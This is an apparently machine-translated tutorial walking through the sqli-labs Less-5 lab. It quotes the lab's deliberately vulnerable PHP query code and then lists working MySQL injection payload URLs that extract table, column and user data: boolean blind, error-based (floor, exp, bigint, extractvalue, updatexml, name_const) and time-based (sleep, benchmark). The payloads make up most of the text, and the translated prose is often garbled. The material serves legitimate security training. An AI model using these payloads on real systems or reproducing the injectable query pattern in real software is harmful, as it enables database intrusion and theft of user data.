Check the background source, we find that return the correct results when run only return you are in ...., does not return information among the database.
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="3" color="#FFFF00">';
print_r(mysql_error());
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
So right off this train of thought is blind.
1, using the left (database (), 1) try
First, look at the version ()
http://127.0.0.1/sql/Less-5/?id=1' and left(version(),1)='5' %23
Here's statement means is to look at the version number 5 is not the first, obvious result returned is correct.
When the version number is not the right time, you can not display correctly you are in ......
You can try out the database version number is 5.6.17
Next, look at the length of the database
http://127.0.0.1/sql/Less-5/?id=1' and length(database())=8 %23
Length is 8, return incorrect results, indicating a length of 8.
I guess the first database
http://127.0.0.1/sql/Less-5/?id=1' and left(database(),1)>'a'--+
Database () is security, so we see his first whether> a, it is clear that s> a, and therefore the right to return. When without our knowledge, the dichotomy can be used to improve the injection efficiency.
Second guess Database
The first is that s, if we look at the top two is greater than the sa
http://127.0.0.1/sql/Less-5/?id=1' and left(database(),2)>'sa'--+
Down the analogy, that the final database called security.
2, using substr () ascii () function attempts
Acquired under the security database table using the following ways
http://127.0.0.1/sql/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100--
Here table_schema can be written = 'security', but the database we use here (), because here database () is security. The same dichotomy here using the test until the test correctly.
Here it should be 101, because the first table is email.
How to get the second character of the first table it? We have learned a substr () function, where the use substr (**, 2,1) can be.
http://127.0.0.1/sql/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>108--+
How to get that second table it? think for a while!
Here you can see the above statement we limit 0,1 used. 0 means that from the beginning to get the first one. To get that second is not that limit 1,1!
http://127.0.0.1/sql/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>113--+
113 return here is correct, because the second one is referers table, so the first one is r.
After the process is constantly repeated above, will not repeat here the wheels made. Principle has been explained clearly.
When you run ended in accordance with the method, it is possible to get the names of all the tables.
3, using a regular injection regexp acquired users listed in the table
The following statement is to choose whether users table column names are listed at the beginning of us
http://127.0.0.1/sql/Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us' limit 0,1)--+
http://127.0.0.1/sql/Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1)--+
You can try the username exists. We can username into other items such as password is correct.
4, using the ord () and MID () function to get the contents of users table
http://127.0.0.1/sql/Less-5/?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68--+
Explain:
(1) cast (username as char) to convert the username to char type, note that this is cast function (Syntax: Cast (field names as type conversion)), I just started to write the case, report the results grammatical errors, check several times before discovery.
(2) ifnull grammar (expr1, expr2) expr1 if the function is not null, ifnull () returns expr1, otherwise it returns expr2.
(3) 0x20 is a space ascii code hexadecimal representation.
(4) mid () function intercept part of a string, mid (str, start, length) from the start position start, intercept length of the bit string str.
(5) ord () function with the ascii (), the character into ascii value.
In summary, this means that the SQL query users username column in the table, sorted id to find a first value, the interception of the first character, to convert it to ascii code, and the 68 (letter size D) for comparison.
We know from the first row of data in the table is Dumb. So the next can only repeat-create the wheel.
Summary: The above 1,2,3,4 us by using different statement, will be demonstrated by all of the payload of SQL Boolean blind once. Presumably better able to note the statement by examples familiar with and understanding of sql boolean blind.
Next, we show you the error injection and injection delay.
5, error injection
Method 1 using floor () function is given injection
http://127.0.0.1/sql/Less-5/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+
Which, select user () can be changed to any query you constructed.
Above refer to the mean hacker sql https://www.freebuf.com/articles/web/38315.html and https://www.cnblogs.com/GH-D/p/8274091.html
Method 2 using double numerical range given injection type out
http://127.0.0.1/sql/Less-5/?id=1' union select (exp(~(select * from (select user())a))),2,3--+
Principle, see Sqli-labs Less-14 using exp () function result value type double injection out of range error is reported
Method 3 using the error injection bigint overflowed
http://127.0.0.1/sql/Less-5/?id=1' union select (!(select * from (select user())x) - ~0),2,3--+
The method using the error injection function xpath
http://127.0.0.1/sql/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+
http://127.0.0.1/sql/Less-5/?id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)--+
Principle can refer to: https://blog.csdn.net/zpy1998zpy/article/details/80631036
The method using the data of repeatability
http://127.0.0.1/sql/Less-5/?id=1' union select 1,2,3 from (select name_const(version(),1),name_const(version(),1))x --+
6, delay injection
The method of using a sleep () function creates a delay injection
http://127.0.0.1/sql/Less-5/?id=1'and if(ascii(substr(database(),1,1))=115,1,sleep(5))--+
When the error will have five seconds delay.
Method 2 using Benchmark () function creates a delay injection
http://127.0.0.1/sql/Less-5/?id=1'UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as current) as tb1--+
When the correct results when run ENCODE ( 'MSG', 'by 5 seconds') operate 50 million times, it will take some time.
At this point, we have to use the method above mentioned blinds all demonstrates once in less5 in. In the subsequent level, it will pick a progressive presentation, other blinds please refer less5.